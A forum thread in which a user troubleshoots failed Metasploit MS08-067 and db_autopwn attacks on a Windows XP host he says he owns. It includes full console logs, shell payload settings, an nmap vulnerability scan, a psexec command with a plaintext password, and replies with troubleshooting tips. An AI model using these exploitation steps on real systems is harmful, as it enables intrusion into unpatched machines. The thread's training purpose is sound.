Question when exploit target via metasploit ms08-06_netapi

Viewing 5 reply threads
  • Author
    Posts
    • #4500
      raymond hua
      Participant

      My test target is 9.181.147.90, When I have set the settings and began to exploit, it appeared below error information: Exploit failed: Connection reset by peer. 
      After the first attempt, I tried to exploit it again. Then the error information is exploit failed: the connection was refused by the remote host (9.181.147.90:445).
      At the same time the port 445 was closed.

      msf exploit(ms08_067_netapi) > set payload generic/shell/bind_tcp
      [-] The value specified for payload is not valid.
      msf exploit(ms08_067_netapi) > set payload generic/shell_bind_tcp
      payload => generic/shell_bind_tcp
      msf exploit(ms08_067_netapi) > set

      Global
      ======

      No entries in data store.

      Module: windows/smb/ms08_067_netapi
      ===================================

        Name                            Value
        —-                           


        ConnectTimeout                  10
        DCERPC::ReadTimeout              0
        DCERPC::fake_bind_multi          true
        DCERPC::fake_bind_multi_append  0
        DCERPC::fake_bind_multi_prepend  0
        DCERPC::max_frag_size            4096
        DCERPC::smb_pipeio              rw
        DisablePayloadHandler            false
        EXITFUNC                        thread
        EnableContextEncoding            false
        RPORT                            445
        SMB::obscure_trans_pipe_level    0
        SMB::pad_data_level              0
        SMB::pad_file_level              0
        SMB::pipe_evasion                false
        SMB::pipe_read_max_size          1024
        SMB::pipe_read_min_size          1
        SMB::pipe_write_max_size        1024
        SMB::pipe_write_min_size        1
        SMBDirect                        true
        SMBDomain                        WORKGROUP
        SMBName                          *SMBSERVER
        SMBPIPE                          BROWSER
        SMBPass                         
        SMBUser                         
        SSL                              false
        SSLVersion                      SSL3
        TCP::max_send_size              0
        TCP::send_delay                  0
        WfsDelay                        0
        lhost                            9.181.73.46
        payload                          generic/shell_bind_tcp
        rhost                            9.181.147.90
        target                          0

      msf exploit(ms08_067_netapi) > exploit

      [*] Started bind handler
      [*] Automatically detecting the target…
      [*] Fingerprint: Windows XP Service Pack 2 – lang:Chinese – Traditional
      [*] Selected Target: Windows XP SP2 Chinese – Traditional (NX)
      [*] Triggering the vulnerability…
      [-] Exploit failed: Connection reset by peer
      [*] Exploit completed, but no session was created.

      Then I used another way, let Metasploit scan execute the exploit automatically via the command db_autopwn -p -t -e. Then the results as below, the exploitation stopped in the Started bind handler for a long time, at last the attempt was failed.

      msf > db_autopwn -p -t -e
      [*] Analysis completed in 8.35199999809265 seconds (0 vulns / 0 refs)
      [*] Matched exploit/linux/samba/lsa_transnames_heap against 9.181.147.90:445…
      [*] Matched exploit/linux/samba/lsa_transnames_heap against 9.181.147.90:445…
      [*] Matched exploit/multi/samba/nttrans against 9.181.147.90:139…
      [*] (3/104): Launching exploit/multi/samba/nttrans against 9.181.147.90:445…
      [*] Matched exploit/multi/samba/nttrans against 9.181.147.90:139…
      [*] (4/104): Launching exploit/multi/samba/nttrans against 9.181.147.90:139…
      [*] Matched exploit/netware/smb/lsass_cifs against 9.181.147.90:445…
      [*] (5/104): Launching exploit/netware/smb/lsass_cifs against 9.181.147.90:445…
      [*] Matched exploit/netware/smb/lsass_cifs against 9.181.147.90:445…
      [*] (6/104): Launching exploit/netware/smb/lsass_cifs against 9.181.147.90:139…
      [*] Matched exploit/osx/email/mailapp_image_exec against 9.181.147.90:25…
      [*] Matched exploit/osx/email/mobilemail_libtiff against 9.181.147.90:25…
      [*] Matched exploit/osx/samba/lsa_transnames_heap against 9.181.147.90:445…
      [*] (9/104): Launching exploit/osx/samba/lsa_transnames_heap against 9.181.147.90:445…
      [*] Matched exploit/osx/samba/lsa_transnames_heap against 9.181.147.90:445…
      [*] (10/104): Launching exploit/osx/samba/lsa_transnames_heap against 9.181.147.90:139…
      [*] Matched exploit/osx/samba/trans2open against 9.181.147.90:139…
      [*] Matched exploit/osx/samba/trans2open against 9.181.147.90:139…
      [*] Matched exploit/solaris/samba/lsa_transnames_heap against 9.181.147.90:445…
      [*] Matched exploit/solaris/samba/lsa_transnames_heap against 9.181.147.90:445…
      [*] Matched exploit/solaris/samba/trans2open against 9.181.147.90:139…
      [*] (15/104): Launching exploit/solaris/samba/trans2open against 9.181.147.90:445…
      [*] Matched exploit/solaris/samba/trans2open against 9.181.147.90:139…
      [*] (16/104): Launching exploit/solaris/samba/trans2open against 9.181.147.90:139…
      [*] Matched exploit/unix/smtp/clamav_milter_blackhole against 9.181.147.90:25…
      [*] (17/104): Launching exploit/unix/smtp/clamav_milter_blackhole against 9.181.147.90:25…
      [*] Matched exploit/unix/webapp/squirrelmail_pgp_plugin against 9.181.147.90:25…
      [*] (18/104): Launching exploit/unix/webapp/squirrelmail_pgp_plugin against 9.181.147.90:25…

      [-] Exploit failed: The following options failed to validate: MAILTO.
      [*] Matched exploit/windows/antivirus/symantec_rtvscan against 9.181.147.90:2967…
      [*] (19/104): Launching exploit/windows/antivirus/symantec_rtvscan against 9.181.147.90:2967…
      [*] Matched exploit/windows/brightstor/etrust_itm_alert against 9.181.147.90:445…
      [*] (20/104): Launching exploit/windows/brightstor/etrust_itm_alert against 9.181.147.90:445…
      [*] Matched exploit/windows/brightstor/etrust_itm_alert against 9.181.147.90:445…
      [*] (21/104): Launching exploit/windows/brightstor/etrust_itm_alert against 9.181.147.90:139…
      [*] Matched exploit/windows/dcerpc/ms03_026_dcom against 9.181.147.90:135…
      [*] (22/104): Launching exploit/windows/dcerpc/ms03_026_dcom against 9.181.147.90:135…
      [*] Started bind handler
      [*] Connecting to SMTP server 9.181.147.90:25…
      [*] Started bind handler
      [*] Started bind handler
      [*] Matched exploit/windows/email/ani_loadimage_chunksize against 9.181.147.90:25…
      [*] Job limit reached, waiting on modules to finish…
      [*] Connected to target SMTP server.
      [*] Banner: 220 9.181.147.90 Simple Mail Transfer Service Ready
      [*] Started bind handler
      [-] Exploit failed: Login Failed: The server responded with unimplemented command 0 with WordCount 0
      [*] Started bind handler
      [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal…
      [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:9.181.147.90[135] …
      [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:9.181.147.90[135] …
      [*] Sending exploit …
      [-] Exploit failed: DCERPC FAULT => nca_s_fault_access_denied
      [*] Matched exploit/windows/smb/ms03_049_netapi against 9.181.147.90:445…
      [*] (24/104): Launching exploit/windows/smb/ms03_049_netapi against 9.181.147.90:445…
      [-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
      [*] Matched exploit/windows/smb/ms03_049_netapi against 9.181.147.90:445…
      [*] (25/104): Launching exploit/windows/smb/ms03_049_netapi against 9.181.147.90:139…
      [*] Started bind handler
      [*] Matched exploit/windows/smb/ms04_007_killbill against 9.181.147.90:445…
      [*] Matched exploit/windows/smb/ms04_007_killbill against 9.181.147.90:445…
      [*] Matched exploit/windows/smb/ms04_011_lsass against 9.181.147.90:445…
      [*] (28/104): Launching exploit/windows/smb/ms04_011_lsass against 9.181.147.90:445…
      [*] Matched exploit/windows/smb/ms04_011_lsass against 9.181.147.90:445…
      [*] (29/104): Launching exploit/windows/smb/ms04_011_lsass against 9.181.147.90:139…
      [*] Started bind handler
      [-] Exploit failed: Login Failed: The server responded with unimplemented command 0 with WordCount 0
      [*] Matched exploit/windows/smb/ms04_031_netdde against 9.181.147.90:445…
      [*] Job limit reached, waiting on modules to finish…
      [*] (30/104): Launching exploit/windows/smb/ms04_031_netdde against 9.181.147.90:445…
      [*] Matched exploit/windows/smb/ms04_031_netdde against 9.181.147.90:445…
      [*] Job limit reached, waiting on modules to finish…
      [*] Started bind handler
      [*] Started bind handler
      [*] Started bind handler
      [-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
      [*] (31/104): Launching exploit/windows/smb/ms04_031_netdde against 9.181.147.90:139…
      [*] Matched exploit/windows/smb/ms05_039_pnp against 9.181.147.90:445…
      [*] Job limit reached, waiting on modules to finish…
      [*] Started bind handler
      [-] Exploit failed: The connection was refused by the remote host (9.181.147.90:2967).
      [*] (32/104): Launching exploit/windows/smb/ms05_039_pnp against 9.181.147.90:445…
      [*] Matched exploit/windows/smb/ms05_039_pnp against 9.181.147.90:445…
      [*] Job limit reached, waiting on modules to finish…
      [*] Connecting to the SMB service…
      [*] Started bind handler
      [-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
      [*] (33/104): Launching exploit/windows/smb/ms05_039_pnp against 9.181.147.90:139…
      [*] Matched exploit/windows/smb/ms06_025_rasmans_reg against 9.181.147.90:445…
      [*] Job limit reached, waiting on modules to finish…
      [*] Connecting to the SMB service…
      [*] Started bind handler
      [-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
      [*] Matched exploit/windows/smb/ms06_025_rasmans_reg against 9.181.147.90:445…
      [*] Matched exploit/windows/smb/ms06_025_rras against 9.181.147.90:445…
      [*] Matched exploit/windows/smb/ms06_025_rras against 9.181.147.90:445…
      [*] Matched exploit/windows/smb/ms06_040_netapi against 9.181.147.90:445…
      [*] (38/104): Launching exploit/windows/smb/ms06_040_netapi against 9.181.147.90:445…
      [*] Matched exploit/windows/smb/ms06_040_netapi against 9.181.147.90:445…
      [*] Job limit reached, waiting on modules to finish…
      [*] Started bind handler
      [-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
      [*] (39/104): Launching exploit/windows/smb/ms06_040_netapi against 9.181.147.90:139…
      [*] Matched exploit/windows/smb/ms06_066_nwapi against 9.181.147.90:445…
      [*] Job limit reached, waiting on modules to finish…
      [*] Started bind handler
      [-] Exploit failed: The connection timed out (9.181.147.90:445).
      [*] (40/104): Launching exploit/windows/smb/ms06_066_nwapi against 9.181.147.90:445…
      [-] Exploit failed: can’t convert nil into Integer
      [*] Matched exploit/windows/smb/ms06_066_nwapi against 9.181.147.90:445…
      [*] (41/104): Launching exploit/windows/smb/ms06_066_nwapi against 9.181.147.90:139…
      [-] Exploit failed: can’t convert nil into Integer
      [*] Matched exploit/windows/smb/ms06_066_nwwks against 9.181.147.90:445…
      [*] (42/104): Launching exploit/windows/smb/ms06_066_nwwks against 9.181.147.90:445…
      [*] Matched exploit/windows/smb/ms06_066_nwwks against 9.181.147.90:445…
      [*] Job limit reached, waiting on modules to finish…
      [*] Connecting to the SMB service…
      [*] Started bind handler
      [-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
      [*] (43/104): Launching exploit/windows/smb/ms06_066_nwwks against 9.181.147.90:139…
      [*] Matched exploit/windows/smb/ms08_067_netapi against 9.181.147.90:445…
      [*] Job limit reached, waiting on modules to finish…
      [*] Connecting to the SMB service…
      [*] Started bind handler
      [-] Exploit failed: The connection timed out (9.181.147.90:139).
      [*] (44/104): Launching exploit/windows/smb/ms08_067_netapi against 9.181.147.90:445…
      [*] Matched exploit/windows/smb/ms08_067_netapi against 9.181.147.90:445…
      [*] Job limit reached, waiting on modules to finish…
      [*] Started bind handler
      [-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
      [*] (45/104): Launching exploit/windows/smb/ms08_067_netapi against 9.181.147.90:139…
      [*] Matched exploit/windows/smb/msdns_zonename against 9.181.147.90:445…
      [*] Job limit reached, waiting on modules to finish…
      [*] Started bind handler

      I’m appreciated if who can help me, thanks!

    • #28198
      3PIL0GU3
      Participant

      Did you try using a Reverse TCP payload instead of a bind shell payload you may have better luck

    • #28199
      Ketchup
      Participant

      I sincerely hope you have permission to exploit that host.  There could be an IPS or AntiVirus product stopping your exploit. 

    • #28200
      raymond hua
      Participant

      To: 3PIL0GU3

      Follow your suggestion, I tried again via windows/shell/reverse_tcp and windows/shell/reverse_tcp_allports. Unfortunately, it also failed.

      Global
      ======

      No entries in data store.

      Module: windows/smb/ms08_067_netapi
      ===================================

        Name                            Value
        —-                           


        ConnectTimeout                  10
        DCERPC::ReadTimeout              0
        DCERPC::fake_bind_multi          True
        DCERPC::fake_bind_multi_append  0
        DCERPC::fake_bind_multi_prepend  0
        DCERPC::max_frag_size            4096
        DCERPC::smb_pipeio              rw
        DisablePayloadHandler            false
        EXITFUNC                        thread
        EnableContextEncoding            false
        RPORT                            445
        SMB::obscure_trans_pipe_level    0
        SMB::pad_data_level              0
        SMB::pad_file_level              0
        SMB::pipe_evasion                False
        SMB::pipe_read_max_size          1024
        SMB::pipe_read_min_size          1
        SMB::pipe_write_max_size        1024
        SMB::pipe_write_min_size        1
        SMBDirect                        True
        SMBDomain                        WORKGROUP
        SMBName                          *SMBSERVER
        SMBPIPE                          BROWSER
        SMBPass                         
        SMBUser                         
        SSL                              false
        SSLVersion                      SSL3
        TCP::max_send_size              0
        TCP::send_delay                  0
        WfsDelay                        0
        lhost                            9.181.73.46
        payload                          windows/shell/reverse_tcp
        rhost                            9.181.147.90
        target                          0

      msf exploit(ms08_067_netapi) > exploit

      [*] Started reverse handler
      [*] Automatically detecting the target…
      [*] Fingerprint: Windows XP Service Pack 2 – lang:Chinese – Traditional
      [*] Selected Target: Windows XP SP2 Chinese – Traditional (NX)
      [*] Triggering the vulnerability…
      [-] Exploit failed: Connection reset by peer
      [*] Exploit completed, but no session was created.

      after the attempt, I use another bash to check port 445, it was closed. before the attempt, port 445 are open….Maybe I should show my scan results from NMAP for you reference.

      Starting Nmap 5.10BETA1 ( http://nmap.org ) at 2009-12-21 09:43 中国标准时间

      NSE: Script Scanning completed.

      Nmap scan report for 27119hua.cn.ibm.com (9.181.147.90)

      Host is up (0.00s latency).

      Not shown: 995 closed ports

      PORT    STATE SERVICE

      25/tcp  open  smtp

      135/tcp  open  msrpc

      139/tcp  open  netbios-ssn

      445/tcp  open  microsoft-ds

      3389/tcp open  ms-term-serv

      Host script results:

      |  smb-check-vulns: 

      |    MS08-067: VULNERABLE

      |    Conficker: Likely CLEAN

      |    regsvc DoS: CHECK DISABLED (add ‘–script-args=unsafe=1’ to run)

      |_  SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add ‘–script-args=unsafe=1’ to run)

    • #28201
      raymond hua
      Participant

      To Ketchup

      9.181.147.90 is owned by myself and all the tests have been approved by my manage.
      I have uninstalled our firewall and I think there have no IPS in our internal network. But I do not know whether exist a limitation. For this case, I can exploit 9.181.147.90 via psexec and have administrator authority.

      C:>psexec \9.181.147.90 -u hua -p basketball -e cmd.exe

      PsExec v1.91 – Execute processes remotely
      Copyright (C) 2001-2007 Mark Russinovich
      Sysinternals – http://www.sysinternals.com

      Microsoft Windows XP [版本 5.1.2600]
      (C) 版权所有 1985-2001 Microsoft Corp.

      C:WINDOWSsystem32>

      Sincerely hope your reply!

    • #28202
      Anonymous
      Participant

      my guess is that the return is bad or something like DEP is preventing code execution. try manually setting the target.

Viewing 5 reply threads
  • You must be logged in to reply to this topic.

Copyright ©2021 Caendra, Inc.

Contact Us

Thoughts, suggestions, issues? Send us an email, and we'll get back to you.

Sending

Sign in with Caendra

Forgot password?Sign up

Forgot your details?